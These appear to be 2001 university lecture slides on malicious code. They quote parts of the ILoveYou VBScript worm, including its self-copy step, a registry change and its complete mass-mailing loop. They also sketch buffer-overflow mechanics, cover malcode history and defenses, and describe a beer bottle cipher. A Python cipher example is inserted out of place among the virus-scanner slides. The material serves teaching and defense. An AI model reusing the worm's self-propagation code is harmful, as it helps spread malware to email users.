Lecture 17: Malcode
From http://cnnfn.cnn.com/2000/10/27/technology/microsoft/
CS588: Security and Privacy
University of Virginia Computer Science
David Evans
http://www.cs.virginia.edu/~evans

Menu
• Examination of ILoveYou Code
• Malicious Code Taxonomy
• Beer Bottle Deciphering (Eric & Michael)
• Malcode Defenses Overview
  – Virus Scanners
12 Nov 2001 University of Virginia CS 588

LoveLetter.VBS
• Excerpts on the manifest
• This 328-line program caused ~$10B in damage
• How much work and smarts was required?

Main loop (excerpt from the slide):

    rem barok -loveletter(vbe) <i hate go to school>
    rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
    On Error Resume Next
    ...
    wscr.RegWrite "...Scripting Host\Settings\Timeout", 0
    sub main()
    ...
    Set c = fso.GetFile(WScript.ScriptFullName)
    c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
    ...
    spreadtoemail()
    ...
    end sub

Slide annotations:
• Smart people would convey a more interesting message.
• Smart virus writers don’t include their contact information.
• This was smart – turn off the scripting timeout in the registry. (Dumb for Microsoft.)

spreadtoemail (edited to fit)

    sub spreadtoemail()
      for ctrlists=1 to mapi.AddressLists.Count
        set a=mapi.AddressLists(ctrlists)
        x=1
        for ctrentries=1 to a.AddressEntries.Count
          malead=a.AddressEntries(x)
          set male=out.CreateItem(0)
          male.Recipients.Add(malead)
          male.Subject = "ILOVEYOU"
          male.Body = "kindly check the attached LOVELETTER coming from me."
          male.Attachments.Add(dirsystem& "\LOVE-LETTER-FOR-YOU.TXT.vbs")
          male.Send
          x=x+1
        next
      next
    end sub

Slide annotations:
• Smart virus writers can spell “mail”.
• Smart virus writers understand for loops.

Be Very Afraid...
• When really dumb people with no resources write malicious programs, it costs $10B.
• What would happen if smart people with resources wrote a malicious program?
• See manifest links:
  – Two interesting scenarios answering this
  – James Gleick article

Attacking Malicious Code
• “Malicious Code” is a bad name
  – Code has no intent
  – Programmer’s intent doesn’t matter; what the code does matters
• As networks get more programmable, accidentally harmful code will become common
• We’ll use “malcode” (mal = bad)
  – It’s not a great name either...

Taxonomy of Code
All Code
  – Harmless Code (occasionally programs are actually useful, too)
  – Malcode
      – Created by Malicious Author
      – Accidental

Taxonomy of Malcode [Stallings, p. 502]
Malcode
  – Requires Host Program: Trap Doors, Logic Bombs, Trojan Horses, Viruses
  – Independent: Insiders, Worms
  (Viruses and Worms are the self-replicating kinds)

Worms and Viruses
• People get into stupid arguments over whether something is a “worm” or a “virus”
  – Is the Internet a host program?
    • See Mark W. Eichin and Jon A. Rochlis, With Microscope and Tweezers: An Analysis of the Internet Virus of November 1988
  – Is Outlook a host program for an email?
• Similarly, for worms/viruses/Trojans
  – If the user must open it (e.g., ILoveYou), is it self-replicating?

Trojan Horses
• Greeks and Trojans at war
  – Eris (Discord), Paris, Aphrodite, Helen
• Greeks attacking Troy bombarded the city for 10 years, but couldn’t get through the city walls.
• Pretended to leave, left a big wooden horse as a gift
• Trojans brought the horse into the city (had to tear down part of the wall to do this), got silly drunk celebrating victory.
• Greeks jumped out, killed the sentries, and let in the Greek army.

Modern Trojan Horses
• User runs a program that looks harmless
  – Program pretends to be “cool, dancing bears”, also erases your hard drive
• Most attacks today are Trojan Horses
  – ILoveYou, Melissa, recent Microsoft attack, etc.
• Rely on modern humans being as dumb as mythical Trojans
  – No matter how good your city/fire walls are, they don’t do any good if you can’t stop users from running random code

Differences between Morris Worm 1988 and Melissa/ILoveYou 1999

Vulnerabilities Exploited
• Morris Worm:
  – Buffer overflow: fingerd uses gets
  – sendmail debug mode
  – Weak Unix passwords
• Melissa:
  – Word enables macros by default, no limitations on macro behavior
• ILoveYou:
  – Dumb people will run code attached to email
• Code Red/Nimda:
  – Buffer overflow in IIS

Buffer Overflows
[Stack diagram: the frame holds the locals int i, int k and char s[64], plus the Frame Pointer and the Return Address; the call is gets(s).]
• Input more than 64 bits: gets just writes down the stack
  – bit 65: address of bit 66 on stack
  – bits 66-...: instructions

Preventing Buffer Overflows
• Use run-time checks on all memory references
  – Safe languages (CLU, Java, Eiffel, etc.)
  – Safe libraries for C (don’t use gets, strcpy, etc.)
• Separate code and data segments
  – Make code segment unwriteable (once application loaded), only allow jumps in code segment
• Static analysis
  – Check binary or source code
• But – about ½ of recent vulnerabilities are still buffer overflows!

Replication Strategy
• Morris Worm
  – Searched .forward files (should have used .rhosts) to find other hosts to attack
  – Used password guessing to break into other accounts
  – Used fingerd, sendmail vulnerabilities
• Melissa/ILoveYou
  – Emails itself to entries in victim’s Outlook address book

Damage
• Morris Worm
  – Infected ~6000 computers (10% of Internet)
• Melissa
  – Infected 1.2 Million machines in a few hours
• ILoveYou
  – $10 Billion in damage
• Nimda, CodeRed
  – ??

Outcomes
• Internet Worm (Robert Morris, Jr.)
  – 3 years suspended sentence (no jail time), $10,000 fine.
  – Current occupation
• Melissa (David Smith) (~$80m damages)
  – Pled guilty, Dec 1999 (second successful prosecution of a virus author), link to plea agreement on manifest
  – Hired by Rutgers as Computer Technician while awaiting sentencing
• ILoveYou ($10B damages)
  – Released without penalty, no laws in Philippines

Responses
• Morris Worm
  – Disconnect from network
  – Disorganized, phone
    • Anonymous message (probably from Robert Morris) explaining how to disable the virus was not noticed or distributed
  – DARPA established CERT
• Melissa
  – CERT Advisory, eradicated quickly
    • But CERT had to rebuild its Web server
• ILoveYou
  – Many countries have since passed laws; Europe treaty announced last week

Malcode Defenses
1. Prevent malcode from running
2. Limit damage it can do
3. Discourage attackers

Malcode Defenses
1. Prevent malcode from running
   Virus scanners – recognize known malcode (today)
   Firewalls – drop incoming packets
   Code signing (only run code from trusted sources)
   Education – make users smarter
2. Limit damage it can do
   Sandbox (“Playpen”) – run malcode in protected virtual machine
   Reference monitors – enforce policy on execution
   Intrusion Detection, System maintenance
3. Discourage attackers
   Legal – pass laws to penalize attackers (Dan Ortiz, Wednesday)
(The slide also marks items “Next Monday”, “Earlier” and “Your PS4’s”.)

Deciphering Rivest’s Beer Bottle Cipher
Michael Neve and Eric Peeters

The beer bottle cipher

The beer bottle cipher
99 bottles of beer on the wall, 99 bottles of beer.
Take one down, pass it around,
98 bottles of beer on the wall.
Plaintext
• Represented by a number: A=01, B=02, …, a “space”=00
• Example: BEER IS LIFE → 020505180009190012090605
• 1 digit = 1 bottle. Here, the plaintext has 24 bottles.

K bottles of beer
[Diagram: the left-most bottle on the wall (3 5 3 8 5 … 9 8 8) is moved to the right end (5 3 8 5 … 9 8 8 3).]
Then multiply by (10*K+1) and keep only the K rightmost digits (giving 4 1 8 8 … 4 6 5 in the diagram).
What could I do with the other beers??? (Bob)

???
“The procedure is complicated enough that you probably should not be drinking beer when you try to do it.”
Drink it!!!! (Bob)

Modulus
This is equivalent to writing:
  New_wall = old_wall * (10*K+1) mod 10^K
Example: number on the wall = 537
  sing “3 bottles of beer”: move the left-most bottle to the right end, new number on wall = 375
  multiply by 31 (which is 10*3+1): result = 11625
  new number on wall = 625

Inverted…
Compute the multiplicative inverse H of (10*K+1) mod 10^K:
  H * (10*K+1) ≡ 1 (mod 10^K)
Then: New_wall * H mod 10^K = old_wall
Proof:
  New_wall = old_wall * (10*K+1) mod 10^K
  New_wall * H mod 10^K = old_wall * (10*K+1) * H mod 10^K
  New_wall * H mod 10^K = old_wall * 1 mod 10^K
  New_wall * H mod 10^K = old_wall

On the wall
There is an encryption key, known as the “skull”.
Wall + skull: keep only the K rightmost digits
  New_wall = (old_wall + skull) mod 10^K
Example: number on wall = 625
  sing “on the wall”: skull = 7972340074652439987611087
  sum = 7972340074652439987611712
  new number on wall = 712
Inverted: (abs(new_wall – skull)) mod 10^K = old_wall

Take one down
[Diagram: the right-most bottle leaves the wall (4 1 8 8 … 4 6 5 → 4 1 8 8 … 4 6) and becomes the bone (5).]
Don’t drink the bone… yet.

Pass it around
[Diagram: t glasses already on the table (2 4 5 5 7 8 3 8 8 3); empty on the first round.]
New table = table * 10 + bigbone

Bigbone?
• It’s a t+1-digit number
• Each digit is the bone
• The new table has t+1 digits
[Diagram: new table 8 7 5 4 8 1 7 4 5 8 5]
Repeat all steps until the wall is empty.
Ciphertext = table

Work with Budweiser???
We are not sure…

Example Matlab program
  beer2('BUDWEISER','1654324617671695465416876154617861');
  First Wall : 022104230509190518
  "18 bottles of beer"
  Wall : 221042305091905180
  New Wall : 008657221634837580
  "on the wall"
  New Wall : 474074097789455441
  "take one down"
  Bone : 1
  New Wall : 47407409778945544
  "pass it around"
  Big Bone : 1
  10 x table : 0
  New Table : 1
  "17 bottles of beer"
  Wall : 74074097789455444
  New Wall : 66670721996880924

Outcomes: Budweiser Example
  Table : 8316199728055301369
  unbeer2(cipher,'1654324617671695465416876154617861');
  New Table : 731619972805530137
  Bone : 9
  "1 bottles of beer"
  Wall : 8
  New Table : 65384219502775236
  Bone : 7
  …

Virus Scanners

Virus Scanners
• Compare code to a database of known malicious code
  – Smart authors create self-mutating viruses
• Reasonably useful in days of “sneaker net” (viruses spread on floppies)
• Reasonably useless when viruses spread as fast as email

Virus Spreading
• Read email every hour
• Everyone’s address book contains 50 people
• Infects 300M people in 6 hours!
[Chart: infected population (0 to 350,000,000) by hour, 1 to 6]
(For a more complex model, see Wang/Knight/Elder paper on manifest.)

Code Red

What Virus Scanner Peddlers Do
http://security.norton.com/

First, it tells you to lower your security settings to allow ActiveX.
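The beer bottle cipher from the slides above (the “K bottles of beer”, “on the wall”, “take one down” and “pass it around” steps, and their inverses from the “Inverted” slides), written out as an added Python example. This is not the presenters’ beer2/unbeer2 Matlab program. It assumes the same skull is added in every round and that the bigbone in round r has r digits, one more than the number of bones already taken down, which is what the unbeer2 output above shows (18 nines, then 17 sevens). The wall is kept as a digit string so that leading zeros still count as bottles; the constant SKULL and the Budweiser values are the slides’ own example.

```python
# Added example: Rivest's beer bottle cipher as the slides describe it
# (not the presenters' Matlab program). The wall is a string of digits so a
# leading zero is still a bottle; the table (ciphertext) is an int.

SKULL = 1654324617671695465416876154617861  # the key from the slides' example


def encode_plaintext(text):
    """A=01 ... Z=26, space=00 (the 'Plaintext' slide)."""
    out = []
    for ch in text.upper():
        if ch == " ":
            out.append("00")
        elif "A" <= ch <= "Z":
            out.append(f"{ord(ch) - ord('A') + 1:02d}")
        else:
            raise ValueError(f"unsupported character {ch!r}")
    return "".join(out)


def decode_plaintext(digits):
    """Inverse of encode_plaintext."""
    pairs = [int(digits[i:i + 2]) for i in range(0, len(digits), 2)]
    return "".join(" " if v == 0 else chr(ord("A") + v - 1) for v in pairs)


def bottles_of_beer(wall):
    """'K bottles of beer': move the left-most bottle to the right end,
    multiply by 10K+1 and keep only the K right-most digits."""
    k = len(wall)
    rotated = wall[1:] + wall[:1]
    return f"{int(rotated) * (10 * k + 1) % 10**k:0{k}d}"


def on_the_wall(wall, skull):
    """'on the wall': add the skull, keep only the K right-most digits."""
    k = len(wall)
    return f"{(int(wall) + skull) % 10**k:0{k}d}"


def take_one_down(wall):
    """'take one down': the right-most bottle leaves the wall as the bone."""
    return wall[:-1], int(wall[-1])


def pass_it_around(table, bone, n_digits):
    """'pass it around': table*10 + bigbone, bigbone being the bone digit
    repeated n_digits times. Assumption (matches the slides' unbeer2 output):
    n_digits is one more than the number of bones taken down before this
    round, whatever the digit count of the table itself."""
    return table * 10 + int(str(bone) * n_digits)


def encrypt(plaintext, skull):
    wall = encode_plaintext(plaintext)
    table = 0
    for rnd in range(1, len(wall) + 1):
        wall = bottles_of_beer(wall)
        wall = on_the_wall(wall, skull)
        wall, bone = take_one_down(wall)
        table = pass_it_around(table, bone, rnd)
    return table  # the ciphertext is the number on the table


def decrypt(table, skull, n):
    """Undo the n rounds in reverse; n is the plaintext length in digits."""
    wall = ""
    for rnd in range(n, 0, -1):
        k = n - rnd + 1                      # bottles on the wall in round rnd
        bone = table % 10
        table = (table - int(str(bone) * rnd)) // 10
        wall += str(bone)                    # put the bone back on the wall
        # undo "on the wall": a modular subtraction, so no abs() is needed
        wall = f"{(int(wall) - skull) % 10**k:0{k}d}"
        # undo the multiplication with H = (10K+1)^-1 mod 10^K, which exists
        # because 10K+1 is odd and not a multiple of 5
        h = pow(10 * k + 1, -1, 10**k)
        wall = f"{int(wall) * h % 10**k:0{k}d}"
        wall = wall[-1] + wall[:-1]          # undo the rotation
    return decode_plaintext(wall)


if __name__ == "__main__":
    cipher = encrypt("BUDWEISER", SKULL)
    print("table:", cipher)
    print("plaintext:", decrypt(cipher, SKULL, 18))
```

The receiver must know the plaintext length in digits (here 18) to replay the rounds in reverse; `pow(x, -1, m)` for the modular inverse needs Python 3.8 or later. Note that the inverse of “on the wall” is a plain modular subtraction, which `%` on a negative number already gives in Python.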
Always Click “Yes”
“During the download, you might see one or more messages asking if it is OK to download and run these programs. Click Yes when these messages appear.”

What it Should Do
• Tell people who have ActiveX turned off, “Good Job”
• Tell people who click “OK” to run their scanner (which accesses every byte on their disk) without checking its certificate that they are very vulnerable and should get an education!

Malcode Summary
• Best defense is education
• Next best defense is a good offense
  – Tough legal penalties for convicted attackers
  – Doesn’t work against motivated foreign governments
• Some technical defenses next Monday
  – Virus Scanners
  – Firewalls, Intrusion Detection
  – Reference Monitors, Proof-Carrying Code

Charge
• Keep cracking on your projects!
• Read the Napster case law
• Go forth and educate!
• Wednesday: Dan Ortiz, Law School
• Monday: Malicious code countermeasures